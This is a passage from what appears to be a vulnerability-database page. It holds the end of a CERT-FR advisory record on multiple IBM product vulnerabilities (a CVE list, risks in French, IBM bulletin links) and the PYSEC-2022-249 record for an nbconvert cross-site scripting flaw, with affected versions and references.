"url": "https://www.cve.org/CVERecord?id=CVE-2022-22844"
},
{
"name": "CVE-2014-1544",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-1544"
},
{
"name": "CVE-2023-4421",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4421"
},
{
"name": "CVE-2023-6277",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6277"
},
{
"name": "CVE-2023-4813",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4813"
},
{
"name": "CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"name": "CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"name": "CVE-2023-50298",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50298"
},
{
"name": "CVE-2024-25629",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25629"
},
{
"name": "CVE-2024-26308",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26308"
},
{
"name": "CVE-2023-50292",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50292"
},
{
"name": "CVE-2018-20676",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20676"
},
{
"name": "CVE-2023-0802",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0802"
},
{
"name": "CVE-2022-2056",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2056"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2024-30172",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30172"
},
{
"name": "CVE-2021-43138",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43138"
},
{
"name": "CVE-2020-25648",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-25648"
},
{
"name": "CVE-2019-17023",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17023"
},
{
"name": "CVE-2022-21699",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21699"
},
{
"name": "CVE-2024-28176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28176"
},
{
"name": "CVE-2019-7317",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-7317"
},
{
"name": "CVE-2024-7264",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7264"
},
{
"name": "CVE-2019-17007",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17007"
},
{
"name": "CVE-2023-0767",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0767"
},
{
"name": "CVE-2023-51074",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51074"
},
{
"name": "CVE-2022-23852",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23852"
},
{
"name": "CVE-2022-22825",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22825"
},
{
"name": "CVE-2023-38289",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38289"
},
{
"name": "CVE-2018-20677",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20677"
},
{
"name": "CVE-2010-1205",
"url": "https://www.cve.org/CVERecord?id=CVE-2010-1205"
},
{
"name": "CVE-2020-23064",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-23064"
},
{
"name": "CVE-2024-22195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22195"
},
{
"name": "CVE-2023-23931",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23931"
},
{
"name": "CVE-2015-7182",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-7182"
},
{
"name": "CVE-2022-23990",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23990"
},
{
"name": "CVE-2018-16335",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-16335"
},
{
"name": "CVE-2024-21011",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21011"
},
{
"name": "CVE-2024-29131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29131"
},
{
"name": "CVE-2021-36770",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36770"
},
{
"name": "CVE-2020-19144",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-19144"
},
{
"name": "CVE-2023-3164",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3164"
},
{
"name": "CVE-2022-3597",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3597"
},
{
"name": "CVE-2024-27983",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27983"
},
{
"name": "CVE-2017-12627",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-12627"
},
{
"name": "CVE-2018-17101",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-17101"
},
{
"name": "CVE-2023-50291",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50291"
},
{
"name": "CVE-2014-1568",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-1568"
},
{
"name": "CVE-2020-26261",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-26261"
},
{
"name": "CVE-2023-24816",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24816"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2023-0801",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0801"
},
{
"name": "CVE-2022-4645",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4645"
},
{
"name": "CVE-2019-17546",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17546"
},
{
"name": "CVE-2022-2869",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2869"
},
{
"name": "CVE-2022-3479",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3479"
},
{
"name": "CVE-2023-40745",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40745"
},
{
"name": "CVE-2024-27982",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27982"
},
{
"name": "CVE-2024-25710",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25710"
},
{
"name": "CVE-2020-15110",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15110"
},
{
"name": "CVE-2023-25435",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25435"
},
{
"name": "CVE-2024-37372",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37372"
},
{
"name": "CVE-2021-38153",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-38153"
},
{
"name": "CVE-2023-5156",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5156"
},
{
"name": "CVE-2024-29133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29133"
},
{
"name": "CVE-2017-18869",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-18869"
},
{
"name": "CVE-2022-0562",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0562"
},
{
"name": "CVE-2023-38325",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38325"
},
{
"name": "CVE-2019-11719",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11719"
},
{
"name": "CVE-2022-0891",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0891"
},
{
"name": "CVE-2018-7456",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-7456"
},
{
"name": "CVE-2023-38288",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38288"
},
{
"name": "CVE-2024-21094",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21094"
},
{
"name": "CVE-2023-0799",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0799"
},
{
"name": "CVE-2019-17006",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17006"
},
{
"name": "CVE-2020-12403",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-12403"
},
{
"name": "CVE-2023-6237",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6237"
},
{
"name": "CVE-2023-6228",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6228"
},
{
"name": "CVE-2021-46848",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46848"
},
{
"name": "CVE-2023-2650",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2650"
},
{
"name": "CVE-2023-0795",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0795"
},
{
"name": "CVE-2024-2398",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2398"
},
{
"name": "CVE-2023-50495",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50495"
},
{
"name": "CVE-2017-18013",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-18013"
},
{
"name": "CVE-2023-25194",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25194"
},
{
"name": "CVE-2023-6129",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6129"
},
{
"name": "CVE-2016-1938",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1938"
},
{
"name": "CVE-2017-11698",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-11698"
},
{
"name": "CVE-2022-22827",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22827"
},
{
"name": "CVE-2024-38337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38337"
},
{
"name": "CVE-2018-12384",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12384"
},
{
"name": "CVE-2018-12404",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12404"
},
{
"name": "CVE-2019-14973",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14973"
},
{
"name": "CVE-2020-36191",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36191"
},
{
"name": "CVE-2024-22018",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22018"
},
{
"name": "CVE-2023-0804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0804"
},
{
"name": "CVE-2023-30775",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30775"
},
{
"name": "CVE-2023-0797",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0797"
},
{
"name": "CVE-2018-14041",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14041"
},
{
"name": "CVE-2023-1916",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1916"
},
{
"name": "CVE-2024-37890",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37890"
},
{
"name": "CVE-2020-19131",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-19131"
},
{
"name": "CVE-2015-7575",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-7575"
},
{
"name": "CVE-2023-41175",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-41175"
},
{
"name": "CVE-2020-11022",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11022"
},
{
"name": "CVE-2018-5784",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-5784"
},
{
"name": "CVE-2018-17000",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-17000"
},
{
"name": "CVE-2024-28863",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28863"
},
{
"name": "CVE-2023-3576",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3576"
},
{
"name": "CVE-2023-4806",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4806"
},
{
"name": "CVE-2020-35523",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35523"
},
{
"name": "CVE-2016-10735",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-10735"
},
{
"name": "CVE-2024-39338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39338"
},
{
"name": "CVE-2022-34749",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-34749"
},
{
"name": "CVE-2024-30171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30171"
},
{
"name": "CVE-2020-19189",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-19189"
},
{
"name": "CVE-2022-0908",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0908"
},
{
"name": "CVE-2023-49083",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-49083"
},
{
"name": "CVE-2024-36114",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36114"
},
{
"name": "CVE-2019-11745",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11745"
},
{
"name": "CVE-2019-11729",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11729"
},
{
"name": "CVE-2024-34102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34102"
},
{
"name": "CVE-2019-11756",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11756"
},
{
"name": "CVE-2021-32862",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32862"
},
{
"name": "CVE-2022-22826",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22826"
},
{
"name": "CVE-2024-4367",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4367"
},
{
"name": "CVE-2024-25016",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25016"
},
{
"name": "CVE-2022-40090",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40090"
},
{
"name": "CVE-2023-25434",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25434"
},
{
"name": "CVE-2024-29896",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29896"
},
{
"name": "CVE-2015-7181",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-7181"
},
{
"name": "CVE-2020-18768",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-18768"
},
{
"name": "CVE-2022-34526",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-34526"
},
{
"name": "CVE-2022-2868",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2868"
},
{
"name": "CVE-2017-5461",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-5461"
},
{
"name": "CVE-2014-1569",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-1569"
},
{
"name": "CVE-2020-12400",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-12400"
},
{
"name": "CVE-2023-31130",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31130"
},
{
"name": "CVE-2024-21085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21085"
},
{
"name": "CVE-2023-32681",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32681"
},
{
"name": "CVE-2017-11695",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-11695"
},
{
"name": "CVE-2023-2908",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2908"
},
{
"name": "CVE-2023-3446",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3446"
},
{
"name": "CVE-2022-22824",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22824"
},
{
"name": "CVE-2020-6829",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-6829"
},
{
"name": "CVE-2017-11697",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-11697"
},
{
"name": "CVE-2023-0800",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0800"
},
{
"name": "CVE-2023-5388",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5388"
},
{
"name": "CVE-2024-27980",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27980"
},
{
"name": "CVE-2023-5678",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5678"
},
{
"name": "CVE-2024-51504",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51504"
},
{
"name": "CVE-2018-19210",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-19210"
},
{
"name": "CVE-2013-2099",
"url": "https://www.cve.org/CVERecord?id=CVE-2013-2099"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
},
{
"name": "CVE-2019-10255",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-10255"
},
{
"name": "CVE-2020-11023",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11023"
},
{
"name": "CVE-2020-35524",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35524"
},
{
"name": "CVE-2019-8331",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8331"
},
{
"name": "CVE-2024-36137",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36137"
},
{
"name": "CVE-2020-35522",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35522"
},
{
"name": "CVE-2022-3570",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3570"
},
{
"name": "CVE-2017-11696",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-11696"
},
{
"name": "CVE-2022-0561",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0561"
}
],
"initial_release_date": "2024-12-20T00:00:00",
"last_revision_date": "2024-12-20T00:00:00",
"links": [],
"reference": "CERTFR-2024-AVI-1103",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-12-20T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2024-12-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7177142",
"url": "https://www.ibm.com/support/pages/node/7177142"
},
{
"published_at": "2024-12-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7177223",
"url": "https://www.ibm.com/support/pages/node/7177223"
},
{
"published_at": "2024-12-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7179044",
"url": "https://www.ibm.com/support/pages/node/7179044"
},
{
"published_at": "2024-12-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7179156",
"url": "https://www.ibm.com/support/pages/node/7179156"
},
{
"published_at": "2024-12-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7179166",
"url": "https://www.ibm.com/support/pages/node/7179166"
},
{
"published_at": "2024-12-13",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7178835",
"url": "https://www.ibm.com/support/pages/node/7178835"
}
]
}
PYSEC-2022-249
Vulnerability from pysec - Published: 2022-08-18 19:15 - Updated: 2022-08-20 05:32
VLAI?
Details
The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer).
Impacted products
| Name | purl | nbconvert | pkg:pypi/nbconvert |
|---|
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "nbconvert",
"purl": "pkg:pypi/nbconvert"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.3.0a0"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.0.0",
"4.0.0",
"4.1.0",
"4.2.0",
"4.3.0",
"5.0.0",
"5.0.0b1",
"5.1.0",
"5.1.1",
"5.2.1",
"5.3.0",
"5.3.1",
"5.4.0",
"5.4.1",
"5.4.1.dev0",
"5.5.0",
"5.6.0",
"5.6.1",
"6.0.0",
"6.0.0a0",
"6.0.0a1",
"6.0.0a2",
"6.0.0a3",
"6.0.0a4",
"6.0.0a5",
"6.0.0a6",
"6.0.0b7",
"6.0.0rc0",
"6.0.1",
"6.0.2",
"6.0.3",
"6.0.4",
"6.0.5",
"6.0.6",
"6.0.7",
"6.1.0",
"6.1.0rc0",
"6.1.1b0",
"6.2.0",
"6.2.0rc0",
"6.2.0rc1",
"6.2.0rc2"
]
}
],
"aliases": [
"CVE-2021-32862",
"GHSA-9jmq-rx5f-8jwq",
"GHSA-h274-fcvj-h2wm"
],
"details": "The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer).",
"id": "PYSEC-2022-249",
"modified": "2022-08-20T05:32:49.275202Z",
"published": "2022-08-18T19:15:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/jupyter/nbconvert/security/advisories/GHSA-9jmq-rx5f-8jwq"
},
{
"type": "ADVISORY",
"url": "https://github.com/jupyter/nbviewer/security/advisories/GHSA-h274-fcvj-h2wm"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…